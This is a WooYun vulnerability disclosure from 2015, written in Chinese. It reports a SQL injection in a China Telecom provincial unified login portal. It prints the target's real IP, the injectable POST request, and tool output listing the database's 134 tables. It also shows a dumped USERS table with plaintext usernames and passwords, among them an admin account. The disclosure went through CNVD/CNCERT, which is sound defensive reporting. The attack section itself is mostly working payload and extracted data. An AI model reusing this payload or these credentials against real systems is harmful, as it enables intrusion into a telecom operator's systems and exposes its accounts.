当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136217

漏洞标题:中国电信某省某系统漏洞SQL注入漏洞

相关厂商:中国电信

漏洞作者: 路人甲

提交时间:2015-08-25 09:16

修复时间:2015-10-10 20:14

公开时间:2015-10-10 20:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-25: 细节已通知厂商并且等待厂商处理中
2015-08-26: 厂商已经确认,细节仅向厂商公开
2015-09-05: 细节向核心白帽子及相关领域专家公开
2015-09-15: 细节向普通白帽子公开
2015-09-25: 细节向实习白帽子公开
2015-10-10: 细节向公众公开

简要描述:

由于对相关参数导致不严导致存在SQL注入,大量的信息泄露。

详细说明:

openEAP_统一登录门户http://222.211.79.137:9080/security/authen
测试POST注入:

1.png


payload:
POST /eapsoa/AjaxAdapter HTTP/1.1
Host: 222.211.79.137:9080
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Proxy-Connection: keep-alive
Cookie: JSESSIONID=F6AEB55701EEFD4F3E221E393BCA3E0F; STICK_EAP_TOKEN=OPENEAP_NODE_NAME.
Content-Type: application/x-www-form-urlencoded
Content-Length: 240
<service> <serviceID>SYS_USER_LOGIN_CHECK</serviceID> <parameters><parameter index="1" type="string">username</parameter><parameter index="2" type="string">password</parameter><parameter index="3" type="string"></parameter></parameters> </service>

漏洞证明:

当前数据库:
web application technology: Servlet 2.4,Tomcat 4.2.2.
back-end DBMS: Oracle
current schema(equivalent to database on Oracle): 'OPENEAP'
OPENEAP数据库表信息:
Database: OPENEAP
[134 tables]
+---------------------------+
| ACTION |
| POSITION |
| ACLENTRIES |
| APP_AUTH |
| APP_REG |
| APP_SYS |
| ARCH_FLDS |
| AUTH_LIST |
| AUTO_ARCH |
| AWOKE_SET |
| BASEROLE_ADMIN |
| BASE_USER |
| BASE_USER_HIS |
| BUSINESS_ROLE |
| CHARACTERCONTENT |
| CLASS_DEF |
| CODE_SKILL |
| COMM_POSI |
| CSS_DEF |
| DATATABLE_ACL |
| DB_WIZARD |
| DEAL_INFO |
| DEAL_MSG |
| DEPT_TYPE |
| DOC_CLASS |
| DOC_TEMPLATE |
| ENROLL_FILE |
| FASTQUERY |
| FLD_DESC |
| FLOWDIRECTORY |
| FLOW_DEF |
| FLOW_INST |
| FLOW_UPLOAD |
| FORM |
| FORMSET |
| FORM_IMG |
| FRAMEDEPARTMENT |
| FRAMEHISTORY |
| FRAMEMODIFY |
| FRAMEUSER |
| FRAMEWORK |
| FRAMEWORK_RIGHT |
| GROUPMEMBERS |
| HYPO_TBL |
| INFO_PUBLISH |
| INFO_TYPE |
| IVR_FLOW |
| KEYWORD |
| LDAP_INFO |
| LOCK_FORM |
| LOG_RECORD |
| MAIL_TBL |
| OAPORTAL_WORKBENCH_CONFIG |
| ONLINE_LOG |
| OPENEAP_VERSION |
| OPERATOR_LOG |
| PBCATCOL |
| PERS_FUNC |
| PERS_MODU |
| POSITIONHISTORY |
| POSITION_TYPE |
| PU_ATTACHMENT |
| PU_DB_INFO |
| PU_DB_PARA |
| PU_DB_SEARCH |
| PU_DOC_TYPE |
| PU_FIELD_IDENTIFY |
| PU_FILEDISK |
| PU_FOLDER |
| PU_FOLDER_PAGE |
| PU_FOLDER_TEMPLATE |
| PU_FULLSEARCH |
| PU_IMAGE |
| PU_MANAGER |
| PU_RECORD |
| PU_RECORDDISCUSS |
| PU_RECORDGRADE |
| PU_RECORDRIGHT |
| PU_RELATEKEY |
| PU_RIGHT |
| PU_SEQ |
| PU_TEMPLATE |
| RIGHT_DEF |
| SIGN_INFO |
| SMS_STAT |
| SMS_TBL |
| STEP_DEF |
| STEP_INST |
| SUB_STAT |
| SYSCONFIG |
| SYS_CODETABLE |
| SYS_CODETABLE_1 |
| SYS_DATADEF |
| SYS_DEPTFUN |
| SYS_FILE |
| SYS_FILE2 |
| SYS_FUNLIST |
| SYS_IMG |
| SYS_ROLEFUN |
| SYS_ROLES |
| SYS_SECR |
| SYS_SEQ |
| SYS_SITE |
| SYS_SVR |
| SYS_URGE |
| SYS_USER |
| TBL_DESC |
| TREE_DEF |
| URGENCY |
| URGE_DEF |
| URGE_INFO |
| USERS |
| USERSIGN |
| USERTIMESTAMP |
| USERXMLBASE |
| USER_BUSINESS_ROLE |
| USER_COMPLAINT |
| USER_CSS |
| USER_DEPT |
| USER_EXT_CALLCENTER |
| USER_GROUP |
| USER_PASSWORD_HISTORY |
| USER_PROF |
| USER_ROLE |
| USER_SYN |
| WASGROUPS |
| WF_MARKRIGHT |
| WF_WATERMARK |
| WITHDRAWCOMMENT |
| WORKGROUP |
| WORKTIME |
| WORK_SEQ |
| XMLBASE |
| XML_SEQ |
+---------------------------+
Database: OPENEAP
Table: USERS
[2 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| U_NAME | VARCHAR2 |
| U_PASSWORD | VARCHAR2 |
+------------+----------+
Database: OPENEAP
Table: USERS
[6 entries]
+----------+--------------+
| U_NAME | U_PASSWORD |
+----------+--------------+
| 118114bb | 111111 |
| admin | pcisuntek028 |
| eptel | eptel028 |
| hsbb | hsbb001 |
| lisi | 123456 |
| zhangsan | 123456 |
+----------+--------------+
账号存在弱口令,建议提高密码复杂度。

1.png


修复方案:

添加防注模块,或者部署web防火墙。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-26 20:12

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无